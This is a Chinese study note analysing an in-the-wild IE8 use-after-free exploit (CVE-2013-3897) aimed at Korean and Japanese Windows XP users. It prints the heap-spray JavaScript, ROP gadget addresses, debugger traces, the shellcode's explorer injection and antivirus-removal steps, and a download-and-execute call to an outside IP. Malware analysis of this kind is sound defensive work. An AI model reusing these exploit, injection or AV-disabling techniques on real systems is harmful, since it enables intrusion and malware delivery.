CVE-2013-3897样本分析学习笔记
发布时间:2014-07-15 11:50:28作者:知识屋
1. 概述
该样本攻击对象为韩国和日本的WinXP IE8用户,利用了IE8的CDisplayPointer对象的一个Use-After-Free漏洞,利用DEPS HeapSpray技术进行堆喷射,通过msvcrt.dll构造ROP链绕过DEP进行利用。成功利用后,会注入Shellcode到explorer进程,尝试检查结束Kaspersky、AhnLab V3Lite、AhnLab V3 365 Clinic、NaverVaccine、ALYac安全软件,之后从网络服务器上下载执行伪造成GIF的恶意程序。
2. 样本分析
1) 通过DIV元素设置和清除title属性字符串,大量的申请释放大小为0×48的堆空间,激活LFH机制,防止cache分配空间,用0×14141414填充,作为后续vtable jmp
var vault=new Array();
var str=unescape("% u1414% u1414");
while (str.length < 0x50) str=str+str;
str=str.substr(0,(0x48-2)/2);
for (i=0;i<2000;i++) {
vault.push(document.createElement("div"));
vault[i].setAttribute("title",str);
}
for (i=1000;i<2000;i++) vault[i].setAttribute("title",""); CollectGarbage();
2) 检查用户电脑环境是否满足: Windows XP + IE8 + 韩国/日本
if(navigator.appName.indexOf("Microsoft Internet Explorer") == -1) {att = 0;}
if(navigator.userAgent.indexOf("Windows NT 5.1") == -1) {att = 0;}
if(navigator.userAgent.indexOf("MSIE 8.0") == -1) {att = 0;}
if(navigator.systemLanguage == navigator.userLanguage) {
if(navigator.systemLanguage.indexOf("ko") != -1) {lang = 1;}
else if(navigator.systemLanguage.indexOf("ja") != -1) {lang = 1;}
3) 如果为韩国日本用户,替换为msvcrt.dll对应的ROP链,然后进行HeapSpray
var ate1 = 0x77BD18D3 ;var atz1 = 0x77BCEF5B ; var co1 = 0x77BCF519 ;
var pco1 = 0x77BD3E25 ; var jtc1 = 0x77BE746A ; var vPP1 = 0x77BC1120 ;
if(lang == 1) { ate = ate1; atz = atz1; co = co1; pco = pco1; jtc = jtc1; vPP = vPP1;
3. 漏洞分析
1) 样本本身带了比较多的调试信息, 利用样本已有调试信息,先观察下exp执行的过程
bu jscript!JsAtan2 "j (poi(poi(esp+14)+18) == 0x999) '.printf "DEBUG: %mu", poi(poi(poi(esp+14)+8)+8); .echo; g';" 0:008> g
DEBUG: before unselect
DEBUG: after unselect
DEBUG: before select
DEBUG: before swap
DEBUG: after swap
DEBUG: before unselect
DEBUG: after unselect
(418.76c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14141414 ebx=04c25dbc ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002
eip=77bd18d5 esp=030dc1e4 ebp=030dc218 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
VERSION!VerpQueryValue+0x54:
77bd18d5 018d45e0508d add dword ptr [ebp-72AF1FBBh],ecx ss:0023:905ea25d=????????
2) 由于不是韩国或日本的windows xp系统,跳转到77bd18d5(本应该msvcrt.dll的)指向的ROP链不正确,触发了异常, 修改跳转地址,重新调试
(8d0.ca0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0494f48c ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002
eip=6362746c esp=030dc1e8 ebp=030dc218 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!QIClassID+0x45:
6362746c ff10 call dword ptr [eax] ds:0023:41414141=????????
0:008> kb
ChildEBP RetAddr Args to Child
030dc218 638cbbf7 0494f48c 3050f4a5 11cf98b5 mshtml!QIClassID+0x45
030dc290 638cab07 00195380 0494f48c 00000000 mshtml!CDoc::ScrollPointerIntoView+0xc5
030dc2a4 639d115f 0494f470 0020deb8 00000000 mshtml!CDisplayPointer::ScrollIntoView+0x21
030dc2c4 639d10bd 030dc354 030dc390 00000002 mshtml!CHTMLEditor::SelectRangeInternal+0x98
030dc2dc 639d7416 0020deb8 030dc354 030dc390 mshtml!CHTMLEditor::SelectRange+0x1a
3) 此时对象空间已经被DIV的title属性值的str字符串所填充
0:008> dds ebx
0494f48c 41414141
0494f490 41414141
0494f494 41414141
0494f498 41414141
0494f49c 41414141
0:008> !heap -p -a ebx
address 0494f48c found in
_HEAP @ 140000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0494f468 000c 0000 [07] 0494f470 00048 - (busy)
Trace: 23a0
7c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e1
7c969564 ntdll!RtlAllocateHeapSlowly+0x00000044
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
6365173e mshtml!_HeapAllocString+0x00000051 <------ !!!
63651871 mshtml!CAttrValue::InitVariant+0x00000154
看下问题代码的上下文, 在进行CLSID为_IID_IProxyManager的接口查询时,使用被释放的对象指针触发异常
.text:63627454 and dword ptr [esi], 0
.text:63627457 mov eax, [ebx]
.text:63627459 and [ebp+pInterface], 0
.text:6362745D lea ecx, [ebp+pInterface]
.text:63627460 push ecx
.text:63627461 push offset _IID_IProxyManager
.text:63627466 push ebx
.text:63627467 mov edi, 80004002h
.text:6362746C call dword ptr [eax] ;
...
.text:638CBBC8 mov [esp+58h+var_38], eax
.text:638CBBCC mov eax, [esp+58h+var_18]
.text:638CBBD0 lea eax, [eax+ecx+2]
.text:638CBBD4 mov [esp+58h+var_30], eax
.text:638CBBD8 lea eax, [esp+58h+local_pI_CMarkupPointer]
.text:638CBBDC push eax ; void **
.text:638CBBDD mov [esp+5Ch+var_34], esi
.text:638CBBE1 sub esp, 10h
.text:638CBBE4 mov edi, esp
.text:638CBBE6 push [ebp+arg_ICMarkupPointer] ; struct IUnknown * <---- !!!
.text:638CBBE9 mov esi, offset _CLSID_CMarkupPointer
.text:638CBBEE movsd
.text:638CBBEF movsd
.text:638CBBF0 movsd
.text:638CBBF1 movsd
.text:638CBBF2 call ?QIClassID@@YGJPAUIUnknown@@U_GUID@@PAPAX@Z ; QIClassID(IUnknown *,_GUID,void * *)
.text:638CBBF7 test eax, eax
...
.text:638CBB50 push eax ; Dst
.text:638CBB51 call _memset
.text:638CBB56 add esp, 0Ch
.text:638CBB59 lea eax, [esp+58h+Dst]
.text:638CBB5D push eax ; int
.text:638CBB5E push [ebp+arg_ZERO] ; int
.text:638CBB61 push [ebp+arg_ICMarkupPointer] ; struct IUnknown * <--- !!!
.text:638CBB64 call ?GetLineInfo@CDoc@@QAEJPAUIMarkupPointer@@HPAU_HTMLPtrDispInfoRec@@@Z ; CDoc::GetLineInfo(IMarkupPointer *,int,_HTMLPtrDispInfoRec *)
.text:638CBB69 lea eax, [ebx+1F0h]
.text:638CBB6F lea edi, [esp+58h+var_44] ...
在 call CDoc::GetLineInfo以及Call QIClassID处下断点
0:008> bl
...
2 d 638cbb64 0001 (0001) 0:**** mshtml!CDoc::ScrollPointerIntoView+0x32
3 d 638cbbf2 0001 (0001) 0:**** mshtml!CDoc::ScrollPointerIntoView+0xc0
4) 在DEBUG信息swap时激活
0:008> be 2,3
0:008> g
DEBUG: after swap
eax=030db578 ebx=030db528 ecx=003bb480 edx=633b5f09 esi=049f5518 edi=030db518
eip=633b5f09 esp=030db4d8 ebp=030db53c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
jscript!JsAtan2:
633b5f09 8bff mov edi,edi
0:008> g
Breakpoint 2 hit
eax=030dc264 ebx=001938f0 ecx=00000000 edx=00000000 esi=04b4edd0 edi=04b4ede0
eip=638cbb64 esp=030dc22c ebp=030dc290 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
mshtml!CDoc::ScrollPointerIntoView+0x32:
638cbb64 e8b9faffff call mshtml!CDoc::GetLineInfo (638cb622)
导致问题产生的可能是CDisplayPointer对象,利用代码也表明触发问题的对象在winxp IE8下大小为0×48,与CDisplayPointer一致
此时还没有被释放
0:008> !heap -p -a poi(esp)
address 04b2445c found in
_HEAP @ 140000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
04b24438 000c 0000 [07] 04b24440 00048 - (busy)
mshtml!CDisplayPointer::`vftable' <----------
Trace: 359e
7c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e1
7c969564 ntdll!RtlAllocateHeapSlowly+0x00000044
7c938f01 ntdll!RtlAllocateHeap+0x00000e64
635f047a mshtml!CDoc::CreateDisplayPointer+0x00000024 <-----------
63a07165 mshtml!CSelectTracker::InitPointers+0x00000019
635cb78e mshtml!CSelectionManager::SetCurrentTracker+0x00000026
639dc0bf mshtml!CSelectionManager::Select+0x00000761
639d113a mshtml!CHTMLEditor::SelectRangeInternal+0x00000073
639d10bd mshtml!CHTMLEditor::SelectRange+0x0000001a
639d7416 mshtml!CHTMLEditorProxy::SelectRange+0x00000025
6389c886 mshtml!CDoc::Select+0x0000002f
4. Shellcode分析
1) 换成日本window xp, 通过在msvcrt上构造ROP,调用VirtualProtect来过DEP
0:008> u 0x77BD18D3
msvcrt!type_info::operator==+0x3b:
77bd18d3 94 xchg eax,esp
77bd18d4 c15e8bc1 rcr dword ptr [esi-75h],0C1h
77bd18d8 5d pop ebp
77bd18d9 c20400 ret 4
...
0:008> u 0x77BE746A
msvcrt!_SEH_epilog+0xf:
77be746a 51 push ecx ; ecx = ptr kernel32!VirtualProtect
77be746b c3 ret ; call kernel32!VirTualProtect
然后跳转到1414148c开始执行shellcode,经过一些nop指令后,进行XOR 0×94自解密
141414a9 4a dec edx
141414aa 33c9 xor ecx,ecx
141414ac 6681c1f30c add cx,0CF3h
141414b1 80340a94 xor byte ptr [edx+ecx],94h
141414b5 e2fa loop 141414b1
2) 之后会注入shellcode代码到explore进程
hwnd = User32!FindWindowA(classname: "Progman", windowname:"Program Manager"); <-- explorer.exe
GetWindowThreadProcessId(hwnd, &pid_explorer);
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid_explorer);
hMem = VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc, hMem, 14141796, 00000A10, 00000000);
CreateRemoteThread(hProc, NULL, 0, 6390000, NULL, 0);
kernel32!ExitProcess
3) 注入到explore后,首先通过检查是否存在”c:¥Program Files¥Kaspersky Lab”目录(日本操作系统路径显示为¥),来
判断是否安装卡巴斯基,如果不存在继续执行。
4) sleep 10分钟后,杀软检测函数根据参数1-4执行不同杀软的判断结束操作
参数1时,检测是否安装安博士v3杀毒软件,如果安装调用其自身的卸载程序,然后通过获取卸载确定按钮,通过模拟鼠标
点击来进行卸载。
RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE¥¥AhnLab¥¥V3Lite", 0, KEY_READ, pRes)
RegQueryValueExA(hKeym "InstallPath", 0, REG_SZ, pData, 255);
ShellExecuteA(NULL, "open", "installpath¥Uninst.exe", "Uninstall", 0, 0)
hwnd = FindWindowA(NULL, "V3 Lite f")
SetWindowPos(hWnd, HWND_BOTTOM, 0, 0, 100, 200, SWP_HIDEWINDOW)
FindWindowExA(hParent, hChildAfter, "Button", "f")
PostMessageA(hWnd, WM_LBUTTONDOWN, 0, 0)
PostMessageA(hWnd, WM_LBUTTONUP, 0, 0)
参数2时,检测是否安装AhnLab V3 365 Clinic。参数4时,检测是否安装ESTsoft ALYac。如果安装卸载方式同上
参数3时,检测是否安装NaverVaccine安全软件,如果存在,通过ntsd尝试强制结束对应的进程
WinExec("ntsd -c q -pn NVCAgent.npc", SW_HIDE);
WinExec("ntsd -c q -pn Nsavsvc.npc", SW_HIDE)
5) 之后,调用URLDownloadToFileA从http://1.234.31.154/mii/fird.gif下载文件保存到临时目录为main001.gif,如果main001.gif
满足大于1KB小于500KB,则会调用WinExec隐藏执行。
6) 恶意程序分析时URL已经失效,没有分析,有对该恶意文件的分析
参考
————
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
知识阅读
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
